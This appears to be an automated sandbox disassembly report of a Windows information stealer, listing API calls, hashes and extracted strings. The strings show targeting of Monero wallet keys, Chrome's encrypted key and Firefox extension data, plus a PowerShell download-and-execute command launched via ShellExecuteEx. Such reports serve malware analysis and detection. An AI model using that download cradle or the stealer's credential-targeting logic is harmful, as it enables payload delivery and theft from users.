                                  • Opcode Fuzzy Hash: 04a13a58311972b851fea1e901e4d7d6c5f36508ed38e05744dd186bfdf33749
                                  • Instruction Fuzzy Hash: C401F4B5A40349BBDB10EBE4DC89FAEB7B8EB44705F104599FA05EB291DA7069008B61
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA99EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BA9A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00BA9A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BA9A5A
                                  • LocalFree.KERNEL32(00BA148F), ref: 00BA9A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00BA9A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 6c22913e1e602a3dcb675154d167e8ea152f9f8ce11444a6749259ac313ce734
                                  • Instruction ID: 4d00e031f243c431e37844c064586078bb562f9e8ada0aadf6adabb5a1d69fad
                                  • Opcode Fuzzy Hash: 6c22913e1e602a3dcb675154d167e8ea152f9f8ce11444a6749259ac313ce734
                                  • Instruction Fuzzy Hash: 2E3116B4A00209EFDB14DF94C885BAE77F5FF49300F108199E915AB390D774AA41DFA1
                                  APIs
                                  • lstrcat.KERNEL32(?,01410958), ref: 00BB47DB
                                    • Part of subcall function 00BB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4801
                                  • lstrcat.KERNEL32(?,?), ref: 00BB4820
                                  • lstrcat.KERNEL32(?,?), ref: 00BB4834
                                  • lstrcat.KERNEL32(?,013FA540), ref: 00BB4847
                                  • lstrcat.KERNEL32(?,?), ref: 00BB485B
                                  • lstrcat.KERNEL32(?,0140F718), ref: 00BB486F
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BB8D90: GetFileAttributesA.KERNEL32(00000000,?,00BA1B54,?,?,00BC564C,?,?,00BC0E1F), ref: 00BB8D9F
                                    • Part of subcall function 00BB4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BB4580
                                    • Part of subcall function 00BB4570: RtlAllocateHeap.NTDLL(00000000), ref: 00BB4587
                                    • Part of subcall function 00BB4570: wsprintfA.USER32 ref: 00BB45A6
                                    • Part of subcall function 00BB4570: FindFirstFileA.KERNEL32(?,?), ref: 00BB45BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: ed57d6b5a54bbc7592a7e114e7d84de8923fa8f1ede5b01c5667b69ea9e37de3
                                  • Instruction ID: ddb0ef465a864087693ee5788200b68040f9ddb9af621fb4d00163b39876497f
                                  • Opcode Fuzzy Hash: ed57d6b5a54bbc7592a7e114e7d84de8923fa8f1ede5b01c5667b69ea9e37de3
                                  • Instruction Fuzzy Hash: 203150B690031867DB10FBA0DCC5EFD73BCAB58700F4045D9B35996181EEB4A689CBA5
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB2D85
                                  Strings
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00BB2D04
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00BB2CC4
                                  • ')", xrefs: 00BB2CB3
                                  • <, xrefs: 00BB2D39
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 9919a6cc394b316290154ddd0992b5fd31a82fa203f3bc7cd6a0e4e7555b42a6
                                  • Instruction ID: a385d5d188405f4f1c236a406f483e4001bcbbcff306607fe4d1494c3942da78
                                  • Opcode Fuzzy Hash: 9919a6cc394b316290154ddd0992b5fd31a82fa203f3bc7cd6a0e4e7555b42a6
                                  • Instruction Fuzzy Hash: 63419D71D10208ABDB14FBA0CCA1FFDB7B8AF14300F504199E156BA591DFB46A4ACF91
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00BA9F41
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 4171519190-1096346117
                                  • Opcode ID: 1424cad1c6067313c7cb7646aa5e3b87aa6e69e85cfa462b56cb488f2aa69705
                                  • Instruction ID: ac2bad27217e29b0a6d1a6bcfbaa338aaf435baa4146c385f67895e1716e223a
                                  • Opcode Fuzzy Hash: 1424cad1c6067313c7cb7646aa5e3b87aa6e69e85cfa462b56cb488f2aa69705
                                  • Instruction Fuzzy Hash: 21611C74A14248EBDB24EFA4CC96FED77F5AF45300F008458F90AAB591EBB46A05CB52
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,0140F818,00000000,00020119,?), ref: 00BB40F4
                                  • RegQueryValueExA.ADVAPI32(?,01410A48,00000000,00000000,00000000,000000FF), ref: 00BB4118
                                  • RegCloseKey.ADVAPI32(?), ref: 00BB4122
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4147
                                  • lstrcat.KERNEL32(?,01410A60), ref: 00BB415B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: 1ea100210dd726da86d5319349ab4296922f22791e6ae38c0d67e3e8753356c8
                                  • Instruction ID: 95727bfa84974ef04f80b7707c615f4fff1d37ed424a34a5d26556407f8afb4a
                                  • Opcode Fuzzy Hash: 1ea100210dd726da86d5319349ab4296922f22791e6ae38c0d67e3e8753356c8
                                  • Instruction Fuzzy Hash: 6F41AE76D0020867DB14FBE4DC86FFD73BDA748300F404599B61596181EA756B88CBF2
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00BB696C
                                  • sscanf.NTDLL ref: 00BB6999
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BB69B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BB69C0
                                  • ExitProcess.KERNEL32 ref: 00BB69DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 7db10d78cf3fd42a45eaf18d2f075e2c5696fa457eb98642635f5b93605b4d7e
                                  • Instruction ID: 6d64d5096aa075fda757e1e80e1703b5ef5fed713a5110fc15d0a56049e919ad
                                  • Opcode Fuzzy Hash: 7db10d78cf3fd42a45eaf18d2f075e2c5696fa457eb98642635f5b93605b4d7e
                                  • Instruction Fuzzy Hash: D021CB75D14209ABCF04EFE8D985AEEB7F5FF48300F04856AE406E7250EB746609CBA5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7E37
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,013FBAE0,00000000,00020119,?), ref: 00BB7E5E
                                  • RegQueryValueExA.ADVAPI32(?,0140F8D8,00000000,00000000,000000FF,000000FF), ref: 00BB7E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00BB7E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 577c002485f1f85642391b103e90fc454278a082863f2f6ef50358ae4cda2ccf
                                  • Instruction ID: 0ddaef7fb4586e043ff314c1a8c43d0ffc28918c6432d09f69c4cbb0472ed202
                                  • Opcode Fuzzy Hash: 577c002485f1f85642391b103e90fc454278a082863f2f6ef50358ae4cda2ccf
                                  • Instruction Fuzzy Hash: 5C1130B1A44346EBD710DB98DD85FBBBBBCEB44710F104159F605EB380D7B468018BA1
                                  APIs
                                  • StrStrA.SHLWAPI(014108B0,?,?,?,00BB140C,?,014108B0,00000000), ref: 00BB926C
                                  • lstrcpyn.KERNEL32(00DEAB88,014108B0,014108B0,?,00BB140C,?,014108B0), ref: 00BB9290
                                  • lstrlen.KERNEL32(?,?,00BB140C,?,014108B0), ref: 00BB92A7
                                  • wsprintfA.USER32 ref: 00BB92C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: a73da6e10d1c070a1253927b43a9c993e3a2328456c541e999a91dc2ed4b072e
                                  • Instruction ID: 41fd1c85c2caf995f2d8c4b1fefed5d56442626703a37fdc3111b6c8b03b0269
                                  • Opcode Fuzzy Hash: a73da6e10d1c070a1253927b43a9c993e3a2328456c541e999a91dc2ed4b072e
                                  • Instruction Fuzzy Hash: 2F01C875500249FFCB04EFECC988EAE7BB9EF48355F108588F9099B344C671AA40DBA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BA12B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA12BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BA12D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BA12F5
                                  • RegCloseKey.ADVAPI32(?), ref: 00BA12FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 11f5d0bf370671d56f220fb7d09daf5ec74e6fe6712462ba6ca36b9cb1269fdc
                                  • Instruction ID: cd1117490eb46153fd2969f40f90c26c0a936c3fc4b9003999e91e7edc1eca05
                                  • Opcode Fuzzy Hash: 11f5d0bf370671d56f220fb7d09daf5ec74e6fe6712462ba6ca36b9cb1269fdc
                                  • Instruction Fuzzy Hash: E30136B5A40309BBDB00EFD4DC89FAEB7B8EB48701F008155FA05DB280D670AA018F61
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: 210fe73bb06019ca14dd5fd8e528faefaae021836a4051eef7475eaab31d4d4f
                                  • Instruction ID: d5660beeb0a750d9ddc36c1a55c91546b00de20b1b876f528a574d82a8752489
                                  • Opcode Fuzzy Hash: 210fe73bb06019ca14dd5fd8e528faefaae021836a4051eef7475eaab31d4d4f
                                  • Instruction Fuzzy Hash: 9941C47150075C5FEB22CB248C85FFB7FE8DB45704F1444E8E9CA96182E2B19A44CF60
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00BB6663
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB6726
                                  • ExitProcess.KERNEL32 ref: 00BB6755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 70b0d9c1450757b22cf9a066b029f1a2cfcd7ddb42e41abf03f99b5ab9faae54
                                  • Instruction ID: 32143d48be0f19e10a7eec40d6556099bafe507cd42fc9922d6e52d7e92ec099
                                  • Opcode Fuzzy Hash: 70b0d9c1450757b22cf9a066b029f1a2cfcd7ddb42e41abf03f99b5ab9faae54
                                  • Instruction Fuzzy Hash: 5431FDB1C01218ABDB14EB54DC95BED77BCAF44300F405199F209B6191DFB46B49CFA6
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BC0E28,00000000,?), ref: 00BB882F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB8836
                                  • wsprintfA.USER32 ref: 00BB8850
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: d1894905465049f6b20f421d48cfb9b96b72b8b193ec8cc952d3c0b485acddc8
                                  • Instruction ID: fc7fdc3525b678cb7a410612fa7feb20ebfc139918fc2a6cd679e68133b89f8a
                                  • Opcode Fuzzy Hash: d1894905465049f6b20f421d48cfb9b96b72b8b193ec8cc952d3c0b485acddc8
                                  • Instruction Fuzzy Hash: BE211FB1A40345ABDB04EF98DD85FAEBBB8FB48701F104159F505EB390C77969008BB1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00BB951E,00000000), ref: 00BB8D5B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB8D62
                                  • wsprintfW.USER32 ref: 00BB8D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 683a77f7791d614a87916bb6b10a4b843fcbcf13eab8ad9f75456624a4e7d25e
                                  • Instruction ID: 63fb4aefda1d0a4a7616f07b863ecde9e8a2acdd3d8dd52722da347ee95a966f
                                  • Opcode Fuzzy Hash: 683a77f7791d614a87916bb6b10a4b843fcbcf13eab8ad9f75456624a4e7d25e
                                  • Instruction Fuzzy Hash: FCE08670A40309FBC700EB98DC89E597BB8EB04701F004194FD09CB380D9716E009B62
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BB8B60: GetSystemTime.KERNEL32(00BC0E1A,0140FD60,00BC05AE,?,?,00BA13F9,?,0000001A,00BC0E1A,00000000,?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BB8B86
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BAA2E1
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 00BAA3FF
                                  • lstrlen.KERNEL32(00000000), ref: 00BAA6BC
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BAA743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 790e7c9a3a77cab7a6c0d7ea0801b86486998a201fc91e64194de34745d666b6
                                  • Instruction ID: 5cf5e936d4a0a60305692d6b966018f34df656d1313a4962bd2c6a9f8f6ef8e8
                                  • Opcode Fuzzy Hash: 790e7c9a3a77cab7a6c0d7ea0801b86486998a201fc91e64194de34745d666b6
                                  • Instruction Fuzzy Hash: B2E1DE72C10108ABDB15FBA4DCA2EFE73B8AF14300F508199F516B6591EF706A49CB72
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BB8B60: GetSystemTime.KERNEL32(00BC0E1A,0140FD60,00BC05AE,?,?,00BA13F9,?,0000001A,00BC0E1A,00000000,?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BB8B86
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BAD481
                                  • lstrlen.KERNEL32(00000000), ref: 00BAD698
                                  • lstrlen.KERNEL32(00000000), ref: 00BAD6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BAD72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: c96c08b23d46ba07462926611159985e57b0e7664c8d499b63514041fa82d6fc
                                  • Instruction ID: 0080a3f3c0e347378e81acb9ac0c6d65b6d123ad4fbf8c9b092f1af367f5f084
                                  • Opcode Fuzzy Hash: c96c08b23d46ba07462926611159985e57b0e7664c8d499b63514041fa82d6fc
                                  • Instruction Fuzzy Hash: 6491FF72D10108ABDB14FBA4DCA2EFE73B8AF14300F504199F516B6591EF746A09CB72
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BB8B60: GetSystemTime.KERNEL32(00BC0E1A,0140FD60,00BC05AE,?,?,00BA13F9,?,0000001A,00BC0E1A,00000000,?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BB8B86
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BAD801
                                  • lstrlen.KERNEL32(00000000), ref: 00BAD99F
                                  • lstrlen.KERNEL32(00000000), ref: 00BAD9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BADA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: d0e860355e4991cf4228726a66fbbd1ee4cfb64892a31b625aa14686a1989a02
                                  • Instruction ID: 03a619a16bd42c5952de0f804fa2b092aef11b315717e64c40f0700e558687d3
                                  • Opcode Fuzzy Hash: d0e860355e4991cf4228726a66fbbd1ee4cfb64892a31b625aa14686a1989a02
                                  • Instruction Fuzzy Hash: A881FE72D10108ABDB14FBA4DCA6EFE73B8AF14300F5045A8F506B6591EE746A09CB72
                                  APIs
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA99EC
                                    • Part of subcall function 00BA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BA9A11
                                    • Part of subcall function 00BA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BA9A31
                                    • Part of subcall function 00BA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BA9A5A
                                    • Part of subcall function 00BA99C0: LocalFree.KERNEL32(00BA148F), ref: 00BA9A90
                                    • Part of subcall function 00BA99C0: CloseHandle.KERNEL32(000000FF), ref: 00BA9A9A
                                    • Part of subcall function 00BB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8E52
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00BC1580,00BC0D92), ref: 00BAF54C
                                  • lstrlen.KERNEL32(00000000), ref: 00BAF56B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: 95c3002faacf72a92d29efa159d9e9ac9f20ec197d974001bb60aae80044c31b
                                  • Instruction ID: 213512a68a6d090301ac8a1e163665679d365457418ea893e6b188da588f8056
                                  • Opcode Fuzzy Hash: 95c3002faacf72a92d29efa159d9e9ac9f20ec197d974001bb60aae80044c31b
                                  • Instruction Fuzzy Hash: D851EE75D10108BBDB14FBA4DCA6DFD73B8AF54300F4085A8F816A7591EE746A09CBA2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 139ff791aaaff42e4c82cdeb105c40fe1422ca46dbf1f1ccf625bee0db65d380
                                  • Instruction ID: 687ef998bf55c430b6235427f84b561dd60ebf0dffcb992c58d6805e9433722e
                                  • Opcode Fuzzy Hash: 139ff791aaaff42e4c82cdeb105c40fe1422ca46dbf1f1ccf625bee0db65d380
                                  • Instruction Fuzzy Hash: 0E414E75D14209EFCB04EFA5D895EFEB7F8AB44704F008058E41676290DBB4AA45CFA2
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA99EC
                                    • Part of subcall function 00BA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BA9A11
                                    • Part of subcall function 00BA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BA9A31
                                    • Part of subcall function 00BA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BA9A5A
                                    • Part of subcall function 00BA99C0: LocalFree.KERNEL32(00BA148F), ref: 00BA9A90
                                    • Part of subcall function 00BA99C0: CloseHandle.KERNEL32(000000FF), ref: 00BA9A9A
                                    • Part of subcall function 00BB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BA9D39
                                    • Part of subcall function 00BA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4EEE,00000000,00000000), ref: 00BA9AEF
